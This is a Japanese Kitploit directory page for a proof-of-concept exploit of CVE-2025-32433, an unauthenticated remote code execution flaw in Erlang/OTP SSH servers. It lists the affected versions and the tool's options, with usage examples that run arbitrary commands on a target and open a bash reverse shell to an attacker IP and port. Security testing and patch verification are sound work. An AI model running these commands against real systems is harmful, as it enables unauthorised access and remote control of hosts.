Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC — この脆弱性により、ネットワークアクセスを持つ攻撃者は、事前認証なしでErlang/OTP SSHサーバー上で任意のコードを実行できます。 | Kitploit
ツール/GitHubGitHub/omer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc
脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubomer-efe-curkus/cve-2025-32433-erlang-otp-ssh-rce-poc

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

この脆弱性により、ネットワークアクセスを持つ攻撃者は、事前認証なしでErlang/OTP SSHサーバー上で任意のコードを実行できます。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1621年前未レビュー

CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC

この脆弱性により、Erlang/OTP SSH サーバーにネットワーク経由でアクセスできる攻撃者は、事前の認証なしに任意のコードを実行できます。

説明

Erlang/OTP SSH サーバーに、認証なしのリモートコード実行(RCE)を攻撃者に許す可能性がある深刻な脆弱性が確認されました。SSH プロトコルのメッセージ処理における欠陥を悪用することで、悪意のある攻撃者は有効な認証情報なしに影響を受けるシステムへ不正アクセスし、任意のコマンドを実行できる可能性があります。これにより、該当ホストが侵害され、第三者が機密データへの不正アクセスや改ざんを行う可能性や、サービス拒否(DoS)攻撃につながる可能性があります。

影響を受けるバージョン

root@kitploit:~
OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier

機能

  • 脆弱性チェック: 対象が CVE-2025-32433 の影響を受けるかどうかを判定します。
  • エクスプロイト実行: 任意のコマンドを実行します。
  • リバースシェル: bash ベースのリバースシェルを開始します。

使用方法

root@kitploit:~
python cve-2025-32433.py <host> [options]

オプション:

root@kitploit:~
-p PORT, --port PORT: SSH port (default: 22)

-t TIMEOUT, --timeout TIMEOUT: Connection timeout in seconds (default: 5)

-c COMMAND, --command COMMAND: Custom command to execute

--check: Check if the target is vulnerable

-u urls.txt, --urlfile urls.txt: File containing list of hosts to scan (one per line)

-o output.txt, --output output.txt: Output file to store results.

--shell: Launch a reverse shell

--lhost LHOST: Attacker's IP for reverse shell

--lport LPORT: Attacker's port for reverse shell (default: 4444)

使用例:

脆弱性のチェック:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --check

コマンドの実行:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'

リバースシェルの開始:

root@kitploit:~
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

参考リンク

GitHub Advisory

NVD CVE-2025-32433

Platform Security

ツールをダウンロード